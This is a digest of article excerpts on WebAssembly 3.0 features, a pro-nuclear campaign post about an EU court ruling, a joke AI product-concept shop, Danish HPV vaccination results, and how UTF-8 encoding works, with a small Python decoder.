Garbage collection. In addition to expanding the capabilities of raw linear memories, Wasm also adds support for a new (and separate) form of storage that is automatically managed by the Wasm runtime via a garbage collector. Staying true to the spirit of Wasm as a low-level language, Wasm GC is low-level as well: a compiler targeting Wasm can declare the memory layout of its runtime data structures in terms of struct and array types, plus unboxed tagged integers, whose allocation and lifetime is then handled by Wasm. But that’s it. Everything else, such as engineering suitable representations for source-language values, including implementation details like method tables, remains the responsibility of compilers targeting Wasm. There are no built-in object systems, nor closures or other higher-level constructs — which would inevitably be heavily biased towards specific languages. Instead, Wasm only provides the basic building blocks for representing such constructs and focuses purely on the memory management aspect.
Typed references. The GC extension is built upon a substantial extension to the Wasm type system, which now supports much richer forms of references. Reference types can now describe the exact shape of the referenced heap value, avoiding additional runtime checks that would otherwise be needed to ensure safety. This more expressive typing mechanism, including subtyping and type recursion, is also available for function references, making it possible to perform safe indirect function calls without any runtime type or bounds check, through the new call_ref instruction.
Tail calls. Tail calls are a variant of function calls that immediately exit the current function, and thereby avoid taking up additional stack space. Tail calls are an important mechanism that is used in various language implementations both in user-visible ways (e.g., in functional languages) and for internal techniques (e.g., to implement stubs). Wasm tail calls are fully general and work for callees both selected statically (by function index) and dynamically (by reference or table).
Exception handling. Exceptions provide a way to locally abort execution, and are a common feature in modern programming languages. Previously, there was no efficient way to compile exception handling to Wasm, and existing compilers typically resorted to convoluted ways of implementing them by escaping to the host language, e.g., JavaScript. This was neither portable nor efficient. Wasm 3.0 hence provides native exception handling within Wasm. Exceptions are defined by declaring exception tags with associated payload data. As one would expect, an exception can be thrown, and selectively be caught by a surrounding handler, based on its tag. Exception handlers are a new form of block instruction that includes a dispatch list of tag/label pairs or catch-all labels to define where to jump when an exception occurs.
Relaxed vector instructions. Wasm 2.0 added a large set of vector (SIMD) instructions, but due to differences in hardware, some of these instructions have to do extra work on some platforms to achieve the specified semantics. In order to squeeze out maximum performance, Wasm 3.0 introduces “relaxed” variants of these instructions that are allowed to have implementation-dependent behavior in certain edge cases. This behavior must be selected from a pre-specified set of legal choices.
Deterministic profile. To make up for the added semantic fuzziness of relaxed vector instructions, and in order to support settings that demand or need deterministic execution semantics (such as blockchains, or replayable systems), the Wasm standard now specifies a deterministic default behavior for every instruction with otherwise non-deterministic results — currently, this includes floating-point operators and their generated NaN values and the aforementioned relaxed vector instructions. Between platforms choosing to implement this deterministic execution profile, Wasm thereby is fully deterministic, reproducible, and portable.
Custom annotation syntax. Finally, the Wasm text format has been enriched with generic syntax for placing annotations in Wasm source code. Analogous to custom sections in the binary format, these annotations are not assigned any meaning by the Wasm standard itself, and can be chosen to be ignored by implementations. However, they provide a way to represent the information stored in custom sections in human-readable and writable form, and concrete annotations can be specified by downstream standards.
In addition to these core features, embeddings of Wasm into JavaScript benefit from a new extension to the JS API:
JS string builtins. JavaScript string values can already be passed to Wasm as externrefs. Functions from this new primitive library can be imported into a Wasm module to directly access and manipulate such external string values inside Wasm.
With these new features, Wasm has much better support for compiling high-level programming languages. Enabled by this, we have seen various new languages popping up to target Wasm, such as Java, OCaml, Scala, Kotlin, Scheme, or Dart, all of which use the new GC feature.
On top of all these goodies, Wasm 3.0 also is the first version of the standard that has been produced with the new SpecTec tool chain. We believe that this makes for an even more reliable specification.
Wasm 3.0 is already shipping in most major web browsers, and support in stand-alone engines like Wasmtime is on track to completion as well. The Wasm feature status page tracks support across engines.
...
Read the original on webassembly.org »
When I launched the Dear Greenpeace campaign with my fellow youth climate activists alongside WePlanet two years ago, I had no idea just how quickly the anti-nuclear dominoes would fall across Europe.
In 2023, what seems like a lifetime ago, Austria launched its legal action against the European Commission for the inclusion of nuclear energy in the EU Sustainable Finance Taxonomy. At the time they were supported by a bulwark of EU countries and environmental NGOs that opposed nuclear energy. Honestly, it looked like they might win.
Germany, long a symbol of anti-nuclear politics, is beginning to shift. The nuclear phase-outs or bans in the Netherlands, Belgium, Switzerland, Denmark, and Italy are now history. Even Fridays for Future has quietened its opposition, and in some places, embraced nuclear power.
It shows what’s possible when we stick to the science. The evidence only gets clearer by the day that nuclear energy has an extremely low environmental impact across its lifecycle, and strong regulations and safety culture ensure that it remains one of the safest forms of energy available to humanity.
The European Court of Justice has now fully dismissed Austria’s lawsuit. That ruling doesn’t just uphold nuclear energy’s place in EU green finance rules. It also signals a near-certain defeat for the ongoing Greenpeace case — the very lawsuit that inspired me to launch Dear Greenpeace in the first place.
But instead of learning from this, Greenpeace is doubling down. Martin Kaiser, Executive Director of Greenpeace Germany, called the court decision “a dark day for the climate”.
Let that sink in. The highest court in the EU just reaffirmed that nuclear energy meets the scientific and environmental standards to be included in sustainable finance, and Greenpeace still refuses to budge.
Meanwhile, the climate crisis gets worse. Global emissions are not falling fast enough. Billions of people still lack access to clean, reliable electricity. And we are forced to spend time defending proven solutions instead of scaling them.
It’s now up to the court whether we will get our time in court to outline the evidence in support of nuclear energy and the important role it can play in the global clean energy transition. Whether in court, on the streets, or in the halls of parliaments across the globe, we will be there to defend the science and ensure that nuclear power can spread the advantages of the modern world across the planet in a sustainable, reliable and dignified way.
Austria stands increasingly isolated among a handful of countries that still cling to their opposition to nuclear energy. Their defeat on this vital, high-stakes issue is a success not just for the nuclear movement, but for the global transition as a whole.
We have made real progress. Together, we’ve helped defend nuclear power in the EU, overturned outdated policies at the World Bank, and secured more technology-neutral language at the UN. These wins are not abstract. They open the door to real investment, real projects, and real emissions cuts.
This is a great success for the movement and it would not have been possible without the financial support, time and energy given by people like you.
...
Read the original on www.weplanet.org »
We’ll find it somewhere across parallel dimensions, just tell us what you want.

What people are saying:
* This made me LoL so many times. It is the best thing to come from AI
* This is the complete opposite of AI Slop: A website that turns absurd queries into unbelievable products, all for the lulz
* This is a hilarious take on generative AI: 😂 an infinite marketplace of any impossibly absurd product you can dream up. Ridiculous, but awesome. And, a domain that fits
* It’s literally an online store that sells… nothing. Well, it sells concepts of products that don’t exist. And it’s more than brilliant!
* It’s just like the real ones, except you don’t have to deal with disappointment or the returns process. Many things in it could and should be real objects
* A web service that uses generative AI to fulfill the desire for ’I want this kind of product!’
* The internet is back! I haven’t felt such a thrilling sense of high-effort whimsical pointlessness since the early 2000s
* I asked for invisible cheese burger, it was very visible, very terrible service, 10/10 would use again

All our products are unique concepts developed specifically for our customers. Our product concepts are delivered instantly to your device! Experience a new way of shopping where imagination drives innovation. Be the first to discover it! Give us a name and we’ll find it somewhere.

© 2025 anycrap.shop — tomorrow’s products, available today (not actually available)
...
Read the original on anycrap.shop »
Denmark has effectively eliminated infections with the two biggest cancer-causing strains of human papillomavirus (HPV) since the vaccine was introduced in 2008, data suggests.
The research, published in Eurosurveillance, could have implications for how vaccinated populations are screened in the coming years — particularly as people increasingly receive vaccines that protect against multiple high-risk types of HPV virus.
After breast cancer, cervical cancer is the most common type of cancer among women aged 15 to 44 years in Europe, and human papillomavirus (HPV) is the leading cause.
At least 14 high-risk types of the virus have been identified, and before Denmark introduced the HPV vaccine in 2008, HPV types 16 and 18 accounted for around three quarters (74%) of cervical cancers in the country.
Initially, girls were offered a vaccine that protected against four types of HPV: 16, 18, plus the lower risk types 6 and 11. However, since 2017, Danish girls have been offered a vaccine that protects against nine types of HPV — including those accounting for approximately 90% of cervical cancers.
To better understand the impact that these vaccination programmes have had on HPV prevalence as vaccinated girls reach cervical screening age (23 to 64 years in Denmark), Dr Mette Hartmann Nonboe at Zealand University Hospital in Nykøbing Falster and colleagues analysed up to three consecutive cervical cell samples collected from Danish women between 2017 and 2024, when they were 22 to 30 years of age.
“In 2017, one of the first birth cohorts of women in Denmark who were HPV-vaccinated as teenage girls in 2008 reached the screening age of 23 years,” Nonboe explained.
“Compared with previous generations, these women are expected to have a considerably lower risk of cervical cancer, and it is pertinent to assess [their] future need for screening.”
The research found that infection with the high-risk HPV types (HPV16/18) covered by the vaccine has been almost eliminated.
“Before vaccination, the prevalence of HPV16/18 was between 15 and 17%, which has decreased in vaccinated women to less than one percent by 2021,” the researchers said.
In addition, the prevalence of HPV types 16 and 18 in women who had not been vaccinated against HPV was five percent. This strongly suggests that the vaccine has reduced the circulation of these HPV types in the general population, to the extent that even unvaccinated women are now less likely to be infected with them — so-called “population immunity” — the researchers said.
Despite this good news, roughly one third of women screened during the study period still had infection with high-risk HPV types not covered by the original vaccines — and new infections with these types were more frequent among vaccinated women, compared to unvaccinated ones.
This is expected to fall once girls who received the more recent ‘nine-valent’ vaccine reach screening age. At this point, the screening guidelines should potentially be reconsidered, Nonboe and colleagues said.
...
Read the original on www.gavi.org »
The first time I learned about UTF-8 encoding, I was fascinated by how well-thought and brilliantly it was designed to represent millions of characters from different languages and scripts, and still be backward compatible with ASCII.
Basically, UTF-8 uses up to 32 bits per character while the old ASCII uses 7 bits, but UTF-8 is designed in such a way that:
* Every ASCII file is a valid UTF-8 file.
* Every UTF-8 encoded file that has only ASCII characters is a valid ASCII file.
Designing a system that scales to millions of characters while remaining compatible with old systems that use just 128 characters is a brilliant piece of design.
Note: If you are already aware of the UTF-8 encoding, you can explore the UTF-8 Playground utility that I built to visualize UTF-8 encoding.
UTF-8 is a variable-width character encoding designed to represent every character in the Unicode character set, encompassing characters from most of the world’s writing systems.
It encodes characters using one to four bytes.
The first 128 characters (U+0000 to U+007F) are encoded with a single byte, ensuring backward compatibility with ASCII, and this is the reason why a file with only ASCII characters is a valid UTF-8 file.
Other characters require two, three, or four bytes. The leading bits of the first byte determine the total number of bytes that represents the current character. These bits follow one of four specific patterns, which indicate how many continuation bytes follow.
Notice that the second, third, and fourth bytes in a multi-byte sequence always start with 10. This indicates that these bytes are continuation bytes, following the main byte.
The remaining bits in the main byte, along with the bits in the continuation bytes, are combined to form the character’s code point. A code point serves as a unique identifier for a character in the Unicode character set. A code point is typically represented in hexadecimal format, prefixed with “U+”. For example, the code point for the character “A” is U+0041.
So here is how software determines the character from UTF-8 encoded bytes (a Python sketch of this loop follows the steps below):
Read a byte. If it starts with 0, it’s a single-byte character (ASCII). Show the character represented by the remaining 7 bits on the screen. Continue with the next byte.
If the byte didn’t start with a 0, then:
If it starts with 110, it’s a two-byte character, so read the next byte as well.
If it starts with 1110, it’s a three-byte character, so read the next two bytes.
If it starts with 11110, it’s a four-byte character, so read the next three bytes.
Once the number of bytes are determined, read all the remaining bits except the leading bits, and find the binary value (aka. code point) of the character.
Look up the code point in the Unicode character set to find the corresponding character and display it on the screen.
Read the next byte and repeat the process.
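Written out as code, that loop looks roughly like this (a minimal Python sketch with no error handling, not production code):

def decode_utf8(data: bytes) -> str:
    chars, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0b10000000:                 # 0xxxxxxx: single-byte (ASCII) character
            code_point, length = b, 1
        elif b >> 5 == 0b110:              # 110xxxxx: two-byte character
            code_point, length = b & 0b00011111, 2
        elif b >> 4 == 0b1110:             # 1110xxxx: three-byte character
            code_point, length = b & 0b00001111, 3
        else:                              # 11110xxx: four-byte character
            code_point, length = b & 0b00000111, 4
        for cont in data[i + 1 : i + length]:      # continuation bytes all start with 10
            code_point = (code_point << 6) | (cont & 0b00111111)
        chars.append(chr(code_point))              # look up the code point in Unicode
        i += length
    return "".join(chars)

print(decode_utf8(bytes([0xE0, 0xA4, 0x85])))      # अ (code point U+0905)
print(decode_utf8("Hey👋 Buddy".encode("utf-8")))  # Hey👋 Buddy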
The Hindi letter “अ” (officially “Devanagari Letter A”) is represented in UTF-8 as the three bytes 11100000 10100100 10000101 (hex E0 A4 85).
The first byte 11100000 indicates that the character is encoded using 3 bytes.
The remaining bits of the three bytes:
xxxx0000 xx100100 xx000101 are combined to form the binary sequence 00001001 00000101 (0x0905 in hexadecimal). This is the code point of the character, represented as U+0905.
The code point U+0905 (see official chart) represents the Hindi letter “अ” in the Unicode character set.
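You can verify this worked example with Python’s built-in UTF-8 codec (a quick sanity check, not part of the original walkthrough):

text = "अ"
print(text.encode("utf-8"))   # b'\xe0\xa4\x85' -> the bytes 11100000 10100100 10000101
print(hex(ord(text)))         # 0x905           -> the code point U+0905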
Now that we understand the design of UTF-8, let’s look at a file that contains the text “Hey👋 Buddy”.
This text has both English characters and an emoji character in it. The text file saved on the disk will have the following 13 bytes in it:
48 65 79 F0 9F 91 8B 20 42 75 64 64 79
Evaluating this file byte-by-byte with the UTF-8 decoding rules: the first three bytes (H, e, y) and the last six (space, B, u, d, d, y) each start with 0, so they are single-byte ASCII characters, while the byte 11110000 (0xF0) starts the four-byte sequence that decodes to the 👋 emoji.
Now this is a valid UTF-8 file, but it doesn’t have to be “backward compatible” with ASCII because it contains a non-ASCII character (the emoji). Next let’s create a file that contains only ASCII characters.
This time the text file contains just “Hey Buddy”, with no non-ASCII characters. The file saved on the disk has the following 9 bytes in it:
48 65 79 20 42 75 64 64 79
Evaluating this file byte-by-byte with the UTF-8 decoding rules, every byte starts with 0, so each one is a single-byte ASCII character.
So this is a valid UTF-8 file, and it is also a valid ASCII file. The bytes in this file follows both the UTF-8 and ASCII encoding rules. This is how UTF-8 is designed to be backward compatible with ASCII.
I did some quick research on other encodings that are backward compatible with ASCII, and there are a few, but they are not as popular as UTF-8; for example, GB 18030 (a Chinese government standard). The ISO/IEC 8859 encodings are another: single-byte encodings that extend ASCII to include additional characters, but they are limited to 256 characters.
The siblings of UTF-8, like UTF-16 and UTF-32, are not backward compatible with ASCII. For example, the letter ‘A’ in UTF-16 is represented as: 00 41 (two bytes), while in UTF-32 it is represented as: 00 00 00 41 (four bytes).
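The difference is easy to see in Python, using the explicit big-endian variants so that no byte-order mark is prepended (again, just an illustrative check):

print("A".encode("utf-8"))      # b'A'               -> 1 byte, identical to ASCII
print("A".encode("utf-16-be"))  # b'\x00A'           -> 2 bytes
print("A".encode("utf-32-be"))  # b'\x00\x00\x00A'   -> 4 bytes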
When I was exploring the UTF-8 encoding, I couldn’t find any good tool to interactively visualize how UTF-8 encoding works. So I built UTF-8 Playground to visualize and play around with UTF-8 encoding. Give it a try!
Read an ocean of knowledge and references that extends this post on Hacker News.
You can also find discussions on OSnews, lobste.rs, and Hackaday
Joel Spolsky’s famous 2003 article (still relevant): The Absolute Minimum Every Software Developer Absolutely, Positively Must Know About Unicode and Character Sets (No Excuses!)
“UTF-8 was designed, in front of my eyes, on a placemat in a New Jersey diner one night in September or so 1992.” - Rob Pike on designing UTF-8 with Ken Thompson
An excellent explainer by Russ Cox: UTF-8: Bits, Bytes, and Benefits
...
Read the original on iamvishnu.com »